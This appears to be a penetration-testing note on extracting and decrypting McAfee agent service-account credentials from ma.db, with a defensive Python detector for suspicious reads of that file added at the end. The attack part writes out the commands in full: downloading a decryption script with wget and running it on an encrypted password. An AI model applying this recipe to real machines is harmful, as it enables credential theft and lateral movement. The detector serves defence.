McAfee Credentials

breachingad

McAfee Enterprise stores the credentials that the agent uses to connect back to the orchestrator in C:\ProgramData\McAfee\Agent\DB\ma.db.

With local administrator access, we can read this file and extract the service account username and password.

$ sqlitebrowser ma.db

Look inside the AGENT_REPOSITORIES table.

We can decrypt the password using mcafee-sitelist-pwd-decryption:

$ wget "https://raw.githubusercontent.com/funoverip/mcafee-sitelist-pwd-decryption/master/mcafee_sitelist_pwd_decrypt.py"
$ python -m venv venv && source venv/bin/activate
$ pip3 install pycryptodome
$ python mcafee_sitelist_pwd_decrypt.py "jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q=="
Crypted password   : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
Decrypted password : MyStrongPassword!
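
On the defensive side, reads of ma.db by anything other than the agent itself can be audited. The following is an added example, not part of the original page: it filters Windows Security 4663 object-access events for this file. It assumes file auditing (a SACL) is enabled on the DB directory; the sample events are constructed, and the trusted agent install directory is an assumption to adjust per deployment.

```python
import ntpath

# Path from the page; Windows paths are compared case-insensitively.
MA_DB = r"C:\ProgramData\McAfee\Agent\DB\ma.db".lower()
# Assumption: directory the agent's own binaries run from. Adjust per deployment.
TRUSTED_DIRS = (r"c:\program files\mcafee\agent",)
READ_DATA = 0x1  # FILE_READ_DATA bit in the 4663 AccessMask field


def is_trusted(process_path):
    """True only if the normalised image path sits under a trusted directory."""
    # normpath collapses ".." so a crafted path cannot pass the prefix check.
    norm = ntpath.normpath(process_path).lower()
    return any(norm.startswith(d + "\\") for d in TRUSTED_DIRS)


def suspicious_reads(events):
    """Return the 4663 events where an untrusted process read ma.db."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4663:
            continue
        if ntpath.normpath(ev.get("ObjectName", "")).lower() != MA_DB:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & READ_DATA:
            continue  # attribute-only or write-only access, not a content read
        if not is_trusted(ev.get("ProcessName", "")):
            hits.append(ev)
    return hits


# Constructed sample events (field names follow Security event 4663).
DB = r"C:\ProgramData\McAfee\Agent\DB\ma.db"
SAMPLE_EVENTS = [
    {"EventID": 4663, "SubjectUserName": "SYSTEM", "ObjectName": DB,
     "ProcessName": r"C:\Program Files\McAfee\Agent\masvc.exe", "AccessMask": "0x1"},
    {"EventID": 4663, "SubjectUserName": "localadmin", "ObjectName": DB,
     "ProcessName": r"C:\Windows\System32\cmd.exe", "AccessMask": "0x1"},
    {"EventID": 4663, "SubjectUserName": "localadmin", "ObjectName": DB.upper(),
     "ProcessName": r"C:\Program Files\McAfee\Agent\..\..\..\Users\Public\reader.exe",
     "AccessMask": "0x1"},
    {"EventID": 4663, "SubjectUserName": "localadmin", "ObjectName": DB,
     "ProcessName": r"C:\Windows\System32\cmd.exe", "AccessMask": "0x80"},
]

if __name__ == "__main__":
    for ev in suspicious_reads(SAMPLE_EVENTS):
        print(f"ALERT {ev['SubjectUserName']} read ma.db via {ev['ProcessName']}")
```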